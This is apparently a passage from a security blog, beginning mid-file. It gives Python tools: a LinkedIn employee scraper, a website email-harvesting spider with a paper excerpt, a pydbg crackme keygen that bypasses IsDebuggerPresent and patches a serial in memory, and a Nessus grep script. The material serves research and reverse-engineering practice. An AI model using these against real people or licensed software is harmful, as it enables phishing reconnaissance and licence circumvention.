                              session_key=self.login,
                              session_password=self.password,
                              session_login="Sign+In",
                              session_rikey=""))
    #need the second request to get the csrf stuff, initial cookies
    request = urllib2.Request("https://www.linkedin.com/secure/login")
    request.add_header("Host", "www.linkedin.com")
    request.add_header("Referer", "https://www.linkedin.com/secure/login?trk=hb_signin")
    time.sleep(1.5)
    fd = opener.open(request, params)
    data = fd.read()
    if '<div id="header" class="guest">' in data:
      print "Linkedin authentication failed. Please supply a valid linkedin account"
      sys.exit(1)
    else:
      print "Linkedin authentication successful"
    fd.close()
    return opener

  def push_search_parameters(self, extraparam):
    uselesswords = [ "for", "the", "and", "at", "in"]
    for pm in extraparam:
      pm = (pm[0], pm[1].strip().lower())
      if (pm not in self.extraparameters) and (pm[1] not in uselesswords) and pm != None:
        self.extraparameters.append(pm)

class LinkedinTotalPageGather(LinkedinPageGatherer):
  """
  Overhead class that generates the person_searchobjs, using GoogleQueery
  """
  def __init__(self, companyName, login, password):
    LinkedinPageGatherer.__init__(self, companyName, login, password)
    extraPeople = []
    for person in self.people_searchobj:
      mgoogqueery = GoogleQueery(person.goog_printstring())
      #making the assumption that each pub url is a unique person
      count = 0
      for url in mgoogqueery.linkedinurl:
        #grab the real name from the url
        begindex = url.find("/pub/") + 5
        endindex = url.find("/", begindex)
        if count == 0:
          person.url = url
          person.name = url[begindex:endindex]
        else:
          extraObj = copy.deepcopy(person)
          extraObj.url = url
          extraObj.name = url[begindex:endindex]
          extraPeople.append(extraObj)
        count += 1
      print person
    print "Extra People"
    for person in extraPeople:
      print person
      self.people_searchobj.append(person)

if __name__ == "__main__":
  #args are email and password for linkedin
  my = LinkedinTotalPageGather(company, sys.argv[1], sys.argv[2])

person_searchobj.py

#! /usr/bin/python

class person_searchobj():
  """this object is used for the google search and the final person object"""

  def __init__ (self, givenname="", familyname="", title="", organization="", location=""):
    """
    given name could be a title in this case, does not matter in terms of google
    but then may have to change for the final person object
    """
    #"name" is their actual name, unlike givenName and family name which are linkedin names
    self.name = ""
    self.givenName = givenname
    self.familyName = familyname
    self.title = title
    self.organization = organization
    self.location = location

    #this is retrieved by GoogleQueery
    self.url = ""

  def goog_printstring(self):
    """return the google print string used for queries"""
    retrstr = "site:linkedin.com "
    for i in  [self.givenName, self.familyName, self.title, self.organization, self.location]:
      if i != "":
        retrstr += '"' + i +'" '
    return retrstr

  def __repr__(self):
    """Overload __repr__ for easy printing. Mostly for debugging"""
    return (self.name + "\n" +
            "------\n" +
            "GivenName: " + self.givenName + "\n" +
            "familyName: " + self.familyName + "\n" +
            "Title: " + self.title + "\n" +
            "Organization: " + self.organization + "\n" +
            "Location: " + self.location + "\n" +
            "URL: " + self.url + "\n\n")

email_spider

This was a small part of a project that itself made up about a third of my graduate project. I used it to collect certain information. Here is the excerpt from the paper.

Website Email Spider Program

In order to automatically process publicly available email addresses, a simple tool was developed, with source code available in Appendix A. An automated tool is able to process web pages in a way that is less error prone than manual methods, and it also makes processing the sheer number of websites possible (or at least less tedious).
This tool begins at a few root pages, which can be comma delimited. From these, it searches for all unique links by keeping track of a queue so that pages are not usually revisited (although revisiting a page is still possible in case the server is case insensitive or equivalent pages are dynamically generated with unique URLs). In addition, the base class is passed a website scope so that pages outside of that scope are not spidered. By default, the scope is simply a regular expression including the top domain name of the organization.
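
The queue-plus-scope logic described above can be sketched as follows. This is a minimal stand-in, not the tool itself: the toy link graph and the get_links callback are invented for illustration in place of real page fetching and parsing.

```python
import re
from collections import deque

def crawl(start, get_links, scope, max_pages=10000):
    # breadth-first: a queue of pages to visit, plus a seen list so
    # pages are not (usually) revisited
    seen = [start]
    queue = deque([start])
    processed = 0
    while queue and processed < max_pages:
        url = queue.popleft()
        processed += 1
        for link in get_links(url):
            # only follow links whose URL matches the site scope regex
            if re.search(scope, link) and link not in seen:
                seen.append(link)
                queue.append(link)
    return seen

# toy link graph standing in for fetched-and-parsed pages
graph = {
    "http://example.com/":  ["http://example.com/a", "http://other.org/x"],
    "http://example.com/a": ["http://example.com/", "http://example.com/b"],
    "http://example.com/b": [],
}
order = crawl("http://example.com/", lambda u: graph.get(u, []), r"example\.com")
# other.org/x is skipped because it falls outside the scope regex
```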

Each page requested searches the contents for the following regular expression to identify common email formats:

[\w_.-]{3,}@[\w_.-]{6,}

The 3 and 6 repeaters were necessary because of false positives otherwise obtained due to various encodings. This regular expression will not obtain all email addresses. However, it will obtain the most common addresses with a minimum of false positives. In addition, the obtained email addresses are run against a blacklist of uninteresting generic form addresses (such as help@example.com, info@example.com, or sales@example.com).
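
As a rough illustration of the repeaters and the blacklist (the sample page text and the split-on-@ comparison here are made up for the example):

```python
import re

email_re = re.compile(r"[\w_.-]{3,}@[\w_.-]{6,}")
page = "Contact john.doe@example.com or a@b.co, or sales@example.com"
found = email_re.findall(page)
# a@b.co is dropped by the {3,}/{6,} repeaters; short matches like it
# were mostly false positives from various encodings
blacklist = ("help", "info", "sales")
kept = [e for e in found if e.split("@")[0] not in blacklist]
```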

These email addresses are saved in memory and reported when the program completes or is interrupted. Note that because of the dynamic nature of some pages, the spider can potentially run indefinitely and must be interrupted (for example, a calendar application that uses links to go back in time indefinitely). Most emails seemed to be obtained in the first 1,000 pages crawled, so a limit of 10,000 pages was chosen as a reasonable scope. Although this limit was reached several times, the spider uses a breadth-first search, and it was observed that most unique addresses were obtained early in the spidering process, with diminishing returns as the page count grew. Despite this, websites with more pages also tended to return more email addresses (see analysis section).

Much of the logic in the spidering tool is dedicated to correctly parsing html. By their nature, web pages vary widely with links, with many sites using a mix of directory traversal, absolute URLs, and partial URLs. It is no surprise there are so many security vulnerabilities related to browsers parsing this complex data.
There is also an effort to make the software somewhat more efficient by ignoring superfluous links to objects such as documents, executables, etc. An exception would catch the processing error if such a file were fetched anyway, but downloading these files consumes resources.
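
For reference, the URL forms the spider resolves by hand (./relative, /absolute-path, //protocol-relative, ../traversal) are the same ones the standard library can normalize. A sketch using Python 3's urllib.parse (in the Python 2 this post uses, the same function lives in the urlparse module):

```python
from urllib.parse import urljoin  # urlparse.urljoin in Python 2

base = "http://example.com/a/b/page.html"
resolved = [
    urljoin(base, "./c.html"),         # relative to the current directory
    urljoin(base, "/top.html"),        # absolute path on the same host
    urljoin(base, "//example.com/x"),  # protocol-relative
    urljoin(base, "../up.html"),       # directory traversal
]
```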

Using this tool is straightforward, but a certain familiarity is expected – it was not developed for an end user but for this specific experiment. For example, a URL is best processed in the format http://example.com/ since in its current state it would use example.com to verify that spidered addresses are within a reasonable scope. It prints debugging messages constantly because every site seemed to have unique parsing quirks. Although other formats and usages may work, there was little effort to make this software easy to use.

Here is the source.
#!/usr/bin/python

import HTMLParser
import urllib2
import re
import sys
import signal
import socket

socket.setdefaulttimeout(20)

#spider is meant for a single url
#proto can be http, https, or any
class PageSpider(HTMLParser.HTMLParser):
  def __init__(self, url, scope, searchList=[], emailList=[], errorDict={}):
    HTMLParser.HTMLParser.__init__(self)
    self.url = url
    self.scope = scope
    self.searchList = searchList
    self.emailList = emailList
    try:
      urlre = re.search(r"(\w+):[/]+([^/]+).*", self.url)
      self.baseurl = urlre.group(2)
      self.proto = urlre.group(1)
    except AttributeError:
      raise Exception("URLFormat", "URL passed is invalid")
    if self.scope == None:
      self.scope = self.baseurl
    try:
      req = urllib2.urlopen(self.url)
      htmlstuff = req.read()
    except KeyboardInterrupt:
      raise
    except urllib2.HTTPError:
      #not able to fetch a url eg 404
      errorDict["link"] += 1
      print "Warning: link error"
      return
    except urllib2.URLError:
      errorDict["link"] += 1
      print "Warning: URLError"
      return
    except ValueError:
      errorDict["link"] += 1
      print "Warning link error"
      return
    except:
      print "Unknown Error", self.url
      errorDict["link"] += 1
      return
    emailre = re.compile(r"[\w_.-]{3,}@[\w_.-]{2,}\.[\w_.-]{2,}")
    nemail = re.findall(emailre, htmlstuff)
    for i in nemail:
      if i not in self.emailList:
        self.emailList.append(i)
    try:
      self.feed(htmlstuff)
    except HTMLParser.HTMLParseError:
      errorDict["parse"] += 1
      print "Warning: HTML Parse Error"
      pass
    except UnicodeDecodeError:
      errorDict["decoding"] += 1
      print "Warning: Unicode Decode Error"
      pass
  def handle_starttag(self, tag, attrs):
    if (tag == "a" or tag =="link") and attrs:
      #process the url formats, make sure the base is in scope
      for k, v in attrs:
        #check it's an href and that it's within scope
        if  (k == "href" and
            ((("http" in v) and (re.search(self.scope, v))) or
            ("http" not in v)) and
            (not v.endswith((".pdf", ".exe", ".doc", ".docx",
                             ".jpg", ".jpeg", ".png", ".css",
                             ".gif", ".GIF", ".mp3", ".mp4",
                             ".mov", ".MOV", ".avi", ".flv",
                             ".wmv", ".wav", ".ogg", ".odt",
                             ".zip", ".gz", ".bz", ".tar",
                             ".xls", ".xlsx", ".qt", ".divx",
                             ".JPG", ".JPEG")))):
          #Also todo - modify regex so that >= 3 chars in front >= 7 chars in back
          url = self.urlProcess(v)
          #TODO 10000 is completely arbitrary
          if (url not in self.searchList) and (url != None) and len(self.searchList) < 10000:
            self.searchList.append(url)
  #returns complete url in the form http://stuff/bleh
  #as input handles (./url, http://stuff/bleh/url, //stuff/bleh/url)
  def urlProcess(self, link):
    link = link.strip()
    if "http" in link:
      return (link)
    elif link.startswith("//"):
      return self.proto + "://" + link[2:]
    elif link.startswith("/"):
      return self.proto + "://" + self.baseurl + link
    elif link.startswith("#"):
      return None
    elif ":" not in link and " " not in link:
      while link.startswith("../"):
        link = link[3:]
        #TODO [8:-1] is just a heuristic, but too many misses shouldn't be bad... maybe?
        if self.url.endswith("/") and ("/" in self.url[8:-1]):
          self.url = self.url[:self.url.rfind("/", 0, -1)] + "/"
      dir = self.url[:self.url.rfind("/")] + "/"
      return dir + link
    return None

class SiteSpider:
  def __init__(self, searchList, scope=None, verbocity=True, maxDepth=4):
    #TODO maxDepth logic
    #necessary to add to this list to avoid infinite loops
    self.searchList = searchList
    self.emailList = []
    self.errors = {"decoding":0, "link":0, "parse":0, "connection":0, "unknown":0}
    if scope == None:
      try:
        urlre = re.search(r"(\w+):[/]+([^/]+).*", self.searchList[0])
        self.scope = urlre.group(2)
      except AttributeError:
        raise Exception("URLFormat", "URL passed is invalid")
    else:
      self.scope = scope
    index = 0
    threshhold = 0
    while 1:
      try:
        PageSpider(self.searchList[index], self.scope, self.searchList, self.emailList, self.errors)
        if verbocity:
          print self.searchList[index]
          print " Total Emails:", len(self.emailList)
          print " Pages Processed:", index
          print " Pages Found:", len(self.searchList)
        index += 1
      except IndexError:
        break
      except KeyboardInterrupt:
        break
      except:
        threshhold += 1
        print "Warning: unknown error"
        self.errors["unknown"] += 1
        if threshhold >= 40:
          break
        pass
    #drop uninteresting generic form addresses (help@..., sales@..., etc)
    garbageEmails = [ "help",
                      "webmaster",
                      "contact",
                      "sales" ]
    print "REPORT"
    print "----------"
    for email in self.emailList:
      if email.split("@")[0] not in garbageEmails:
        print email
    print "\nTotal Emails:", len(self.emailList)
    print "Pages Processed:", index
    print "Errors:", self.errors

if __name__ == "__main__":
  SiteSpider(sys.argv[1].split(","))

pydbg reverseme solution

Last week I wrote a keygen here.

This is an almost identical problem, but the binary has been patched to allow debugging (I may do this programmatically as well, but not yet). I wanted to solve this with programmatic debugging. Here is the exe:
Ice9pch3.

The code simply sets a breakpoint and prints the key to the screen. Also it patches the process memory so that the serial is valid.
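
The byte-at-a-time read in the handler is just walking a NUL-terminated C string out of the debuggee's memory. A sketch of that loop against a mock read function (the buffer contents and names here are invented for illustration):

```python
def read_cstring(read, addr):
    # read one byte at a time until the NUL terminator, the same way
    # the handler below calls mdbg.read(addr, 1)
    out = ""
    while True:
        b = read(addr, 1)
        if b == "\x00":
            return out
        out += b
        addr += 1

# mock "process memory" standing in for the debuggee's address space
mem = "SECRET-KEY\x00junk"
key = read_cstring(lambda a, n: mem[a:a + n], 0)
```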

import sys
import ctypes

from pydbg import *
from pydbg.defines import *


print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it to memory"
print "Basically, pydbg 'hello, world'"
print "-------------"

if len(sys.argv) != 2:
    print "Error. USAGE: keygen.py C:\\full\\path\\ice"
    sys.exit(-1)

def handler_breakpoint(mdbg):
    valid_str = ""
    #the valid serial is at 004030C8
    addr = 0x004030C8
    while 1:
        tmp = mdbg.read(addr, 1)
        addr += 1
        if tmp != "\x00":
            valid_str = valid_str + tmp
        else:
            break
    print "The valid string is: ", valid_str
    print "Writing this to memory..."
    #write this to memory at 00403198
    #def write (self, address, data, length=0)
    wdata = ctypes.create_string_buffer(valid_str)
    mdbg.write(0x00403198, wdata, len(valid_str))
    #checking the write
    #print mdbg.read(0x00403198, len(valid_str) + 1)
    return DBG_CONTINUE

dbg = pydbg()
dbg.set_callback(EXCEPTION_BREAKPOINT, handler_breakpoint)
dbg.load(sys.argv[1])
dbg.debug_event_iteration()
#at 004011FF in execution, 
#def bp_set (self, address, description="", restore=True, handler=None):
dbg.bp_set(0x004011F5)
dbg.debug_event_loop()

Updated solution. I now change a register to circumvent the IsDebuggerPresent call.

import sys
import ctypes

from pydbg import *
from pydbg.defines import *


print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it to memory"
print "Basically, pydbg 'hello, world'"
print "-------------"

if len(sys.argv) != 2:
    print "Error. USAGE: keygen.py C:\\full\\path\\ice"
    sys.exit(-1)

def handler_breakpoint(mdbg):
    if mdbg.get_register("EIP") == 0x004011F5:
        valid_str = ""
        #the valid serial is at 004030C8
        addr = 0x004030C8
        while 1:
            tmp = mdbg.read(addr, 1)
            addr += 1
            if tmp != "\x00":
                valid_str = valid_str + tmp
            else:
                break
        print "The valid string is: ", valid_str
        print "Writing this to memory..."
        #write this to memory at 00403198
        #def write (self, address, data, length=0)
        #wdata = ctypes.create_string_buffer(valid_str)
        mdbg.write(0x00403198, valid_str, len(valid_str))
        #checking the write
        #print mdbg.read(0x00403198, len(valid_str) + 1)
    if mdbg.get_register("EIP") == 0x40106e:
        mdbg.set_register("EAX", 0)
    return DBG_CONTINUE

dbg = pydbg()
dbg.set_callback(EXCEPTION_BREAKPOINT, handler_breakpoint)
dbg.load(sys.argv[1])
dbg.debug_event_iteration()
#0x40106e is the point where we can circumvent the IsDebuggerPresent call
dbg.bp_set(0x40106e)
#at 004011FF in execution, 
#breakpoint for reading/writing at the final compare
dbg.bp_set(0x004011F5)
dbg.debug_event_loop()

Nessus Grep

The code is pretty self explanatory. It searches through a .nessus file and spits out matching hosts.

#!/usr/bin/python

def usage():
  print """
This program takes a regular expression for a problem and returns the
affected hosts. It iterates through all reports saved in a .nessus file,
making no attempt at uniqueness (e.g. if you scanned a host more than once),
searching through titles, data, port, and IDs for matches.

It prints one host per line, relying on tools like wc, tr, sort, uniq

USAGE:
arg[0] [--dns]  myfile.nessus regex

For a regex reference, see http://docs.python.org/library/re.html

The --dns flag will print out the dns name in addition to what was given for 
the scan

EXAMPLES:

#search for hosts that ran the nikto plugin
python nessus_grep.py scan.nessus nikto

#case insensitive search for nikto
python nessus_grep.py scan.nessus "(?i)nikto"

#it's usually ok to just match the plugin id, but be careful;
#as an added precaution I anchor it to the beginning and end of the line
python nessus_grep.py scan.nessus "^10386$" 

#find all hosts with either the SSL Cipher "bug" or running SSL Version 2
python nessus_grep.py scan.nessus "(SSL Weak Cipher Suites Supported|SSL 
Version 2 \(v2\) Protocol Detection)"
"""

import sys
import re
from lxml import etree

def regexsearch(regex, *strings):
  for i in strings:
    try:
      if re.search(regex, i):
        return True
    except TypeError:
      pass

"""
Although there is some repeating logic in dotnessusparse
and dotxmlparse, they are two different formats and are
kept separate in case of changes to only one
"""
def dotnessusparse(nessus_xml, hostprint=False):
  for report in nessus_xml.getroot():
    if "Report" in repr(report.tag):
      for host in report:
        if "ReportHost" in host.tag:
          hostname = (host.find("HostName").text)
          dnsname = host.find("dns_name").text.rstrip(".\n")
          if ("(unknown)" in dnsname):
            dnsname = ""
          reptitem = (host.findall("ReportItem"))
          for issue in reptitem:
            data = issue.find("data").text
            pluginname = issue.find("pluginName").text
            pluginid = issue.find("pluginID").text
            port = issue.find("port").text
            if regexsearch(regex, data, pluginname, pluginid, port):
              if hostprint:
                hostname = hostname + " (" + dnsname + ")"
              print hostname
              break

def dotxmlparse(nessus_xml, hostprint=False):
  for report in nessus_xml.getroot():
    if "Report" in repr(report.tag):
      for host in report:
        if "ReportHost" in host.tag:
          hostname = host.get("name")
          dnsname = ""
          hostprops = host.find("HostProperties").findall("tag")
          for prop in hostprops:
            if prop.get("name") == "host-fqdn":
              dnsname = prop.text
          reptitem = (host.findall("ReportItem"))
          for issue in reptitem:
            data = sol = syn = plugout = None
            if issue.find("description") is not None:
              data = issue.find("description").text
            if issue.find("solution") is not None:
              sol = issue.find("solution").text
            if issue.find("synopsis") is not None:
              syn = issue.find("synopsis").text
            if issue.find("plugin_output") is not None:
              plugout = issue.find("plugin_output").text
            pluginname = issue.get("pluginName")
            pluginId = issue.get("pluginID")
            if regexsearch(regex, sol, syn, plugout, pluginname, pluginId):
              if hostprint:
                hostname = hostname + " (" + dnsname + ")"
              print hostname
              break

if __name__ == "__main__":
  if len(sys.argv) < 3:
    usage()
    sys.exit(0)
  filelist = sys.argv[1:-1]
  try:
    filelist.remove("--dns")
    hostprint = True
  except ValueError:
    hostprint = False
  regex = sys.argv[-1]
  for nessusfile in filelist:
    nessus_xml = etree.parse(nessusfile)
    if nessusfile.endswith(".nessus"):
      dotnessusparse(nessus_xml, hostprint)          
    if nessusfile.endswith(".xml"):
      dotxmlparse(nessus_xml, hostprint)